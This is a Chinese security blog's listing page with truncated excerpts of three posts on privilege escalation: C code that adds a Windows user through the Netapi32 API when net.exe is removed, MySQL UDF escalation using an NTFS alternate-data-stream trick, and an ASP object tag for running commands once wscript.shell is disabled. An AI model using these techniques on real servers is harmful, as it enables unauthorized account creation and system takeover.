热门 无net添加用户(即api添加用户)

时间:2017-1-21   作者:webbaozi   分类: 安全工具   热度:1729°    
时间:2017-1-21   分类: 安全工具    热度:1729  
无net提权(纯API添加用户) 就是net.exe net1.exe被删除时调用api添加用户 之前就看到别人发过这种工具,但是自己还是鼓捣一下:)! 使用vs2015编译。 添加用户账号:webbaozi 用户密码:[email protected]#123 代码: #pragma comment(lib, "Netapi32.lib") #include "stdafx.h" #include <Windows.h> #include <Lm.h> int main() { NET_A...

阅读全文>>

热门 udf提权笔记(及脚本下载)

时间:2016-12-7   作者:webbaozi   分类: 小技巧   热度:2528°    
时间:2016-12-7   分类: 小技巧    热度:2528  
mysql版本大于5.1 1.使用select @@basedir(select @@datadir)查询mysql安装目录 当sehll没有mysql目录操作权限时,利用ADS创建\lib\plugin目录 查询 select 'xxx' into dumpfile 'C:\\MySQL\\lib::$INDEX_ALLOCATION'; 此时会报错 ERROR 3 (HY000): Error writing file 'C:\MySQL\lib::$INDEX_ALLOCATION' (Errcode: 22) 但是lib这个目录已经创建好了。...

阅读全文>>

热门 无wscript.shell组件提权

时间:2016-11-20   作者:webbaozi   分类: web安全   热度:1365°    
时间:2016-11-20   分类: web安全    热度:1365  
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。 要想让运行命令可以试试这种方法,成功率为五五之数。 把下面代码复制: <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runa...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1